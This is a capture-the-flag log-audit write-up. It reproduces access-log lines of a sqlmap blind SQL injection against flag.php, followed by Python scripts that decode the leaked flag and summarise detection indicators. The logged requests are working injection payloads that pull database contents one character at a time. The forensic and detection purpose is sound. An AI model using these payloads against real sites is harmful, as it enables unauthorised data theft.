BMZCTF: Log audit

logcheck.log

This is the access log of a blind SQL injection; the task is to pull out the data leaked through the requests to flag.php.

192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C1%2C1%29%29%3D102--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C2%2C1%29%29%3D108--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C3%2C1%29%29%3D97--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C4%2C1%29%29%3D103--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C5%2C1%29%29%3D123--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C6%2C1%29%29%3D109--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C7%2C1%29%29%3D97--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C8%2C1%29%29%3D121--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C9%2C1%29%29%3D105--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C10%2C1%29%29%3D121--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C11%2C1%29%29%3D97--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C12%2C1%29%29%3D104--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C13%2C1%29%29%3D101--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C14%2C1%29%29%3D105--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C15%2C1%29%29%3D49--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C16%2C1%29%29%3D57--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C17%2C1%29%29%3D54--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C18%2C1%29%29%3D53--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C19%2C1%29%29%3D97--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C20%2C1%29%29%3D101--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C21%2C1%29%29%3D55--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C22%2C1%29%29%3D53--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C23%2C1%29%29%3D54--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C24%2C1%29%29%3D57--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C38%2C1%29%29%3D125--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"

Extracting the flag with Python

from urllib.parse import unquote

# Read the filtered access log (the file named above, logcheck.log).
with open('./logcheck.log') as f:
    lines = f.readlines()

for line in lines:
    line = unquote(line)
    # Skip any line that does not carry an ORD(MID(...))= probe.
    if '))=' not in line:
        continue
    # Keep the number between "))=" and "--": the ORD() value of the leaked character.
    line = line[line.find('))=') + 3:line.find('--')]
    print(chr(int(line)), end="")

flag{mayiyahei1965ae7569}
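The one-liner above works because every request in this log is sqlmap's final equality probe for one character position. The following script is an added example (not part of the original write-up) that does the same reconstruction more defensively: it parses the combined log format, decodes the URL, pulls the position and ORD() value out of the `ORD(MID((...),pos,1))` probe with a regular expression, trusts only the `=` comparisons (a complete sqlmap log also contains `>`/`<` binary-search steps, which this code ignores; that these never state the final byte is an assumption about sqlmap's search order), orders the characters by position, and reports which positions were never confirmed. That last check matters here: the log shown above jumps from position 24 to position 38, so the concatenated output cannot be verified as complete from the log alone. It also summarises per-source indicators a defender would alert on (probe volume, distinct positions probed, the sqlmap User-Agent). The sample log is constructed inline in the same format as the page's lines, with a `>` probe and a benign request added; the helper names are my own.

```python
"""Reconstruct data leaked via boolean-based blind SQL injection from access-log
lines, and summarise indicators for detection. Added example; assumes the
combined log format and sqlmap's ORD(MID((...),pos,1)) probe layout."""
import re
from collections import defaultdict
from urllib.parse import quote, unquote

# Combined log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# One character probe:  ORD(MID((<subquery>),<pos>,1))<op><value>
PROBE_RE = re.compile(
    r"ORD\(MID\(\((?P<sub>.+?)\),(?P<pos>\d+),1\)\)(?P<op>[=<>])(?P<val>\d+)"
)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def extract_probes(lines):
    """Yield (ip, ua, pos, op, val) for every request carrying an ORD(MID(...)) probe."""
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        m = PROBE_RE.search(unquote(rec["path"]))
        if m:
            yield rec["ip"], rec["ua"], int(m["pos"]), m["op"], int(m["val"])


def reconstruct(lines):
    """Rebuild the leaked string from the '=' probes, ordered by position.
    Range probes ('>' / '<') are search steps and are ignored."""
    chars = {}
    for _ip, _ua, pos, op, val in extract_probes(lines):
        if op == "=":
            chars[pos] = chr(val)  # the last '=' probe seen for a position wins
    return "".join(chars[p] for p in sorted(chars))


def missing_positions(lines):
    """Positions from 1 up to the highest probed one that never got an '=' probe."""
    seen = {pos for _ip, _ua, pos, op, _v in extract_probes(lines) if op == "="}
    if not seen:
        return []
    return [p for p in range(1, max(seen) + 1) if p not in seen]


def indicators(lines):
    """Per-source summary for detection: probe count, distinct positions, sqlmap UA."""
    acc = defaultdict(lambda: {"probes": 0, "positions": set(), "sqlmap_ua": False})
    for ip, ua, pos, _op, _v in extract_probes(lines):
        acc[ip]["probes"] += 1
        acc[ip]["positions"].add(pos)
        acc[ip]["sqlmap_ua"] |= "sqlmap" in ua.lower()
    return {
        ip: {"probes": s["probes"], "positions": len(s["positions"]),
             "sqlmap_ua": s["sqlmap_ua"]}
        for ip, s in acc.items()
    }


# --- Constructed sample log mirroring the page's lines (not a real capture) ---
_SUBQUERY = ("SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets "
             "ORDER BY secret LIMIT 0,1")


def _probe_line(pos, op, val):
    """Build one log line in the same shape as the write-up's entries (constructed)."""
    payload = f"hence' AND ORD(MID(({_SUBQUERY}),{pos},1)){op}{val}-- pZaF"
    return ('192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user='
            + quote(payload, safe="") + ' HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip ()"')


SAMPLE_LOG = [
    '192.168.0.1 - - [13/Oct/2018:12:38:13 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    _probe_line(1, ">", 64),    # binary-search step: must not contribute a character
    _probe_line(1, "=", 102),   # 'f'
    _probe_line(2, "=", 108),   # 'l'
    _probe_line(3, "=", 97),    # 'a'
    _probe_line(4, "=", 103),   # 'g'
    _probe_line(5, "=", 123),   # '{'
    _probe_line(38, "=", 125),  # '}' : positions 6..37 deliberately absent
]

if __name__ == "__main__":
    print(reconstruct(SAMPLE_LOG))
    print("positions without an '=' probe:", missing_positions(SAMPLE_LOG))
    print(indicators(SAMPLE_LOG))
```

Run against the real logcheck.log by passing `open("logcheck.log")` in place of `SAMPLE_LOG`; `missing_positions` is the check worth doing before accepting the concatenated string as the complete secret, and `indicators` is the shape of rule a log-monitoring pipeline would fire on (many single-character probes from one source, a scanner User-Agent).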

Published: 2024-01-31 15:39:27

Link: https://www.4u4v.net/it/170668676529585.html
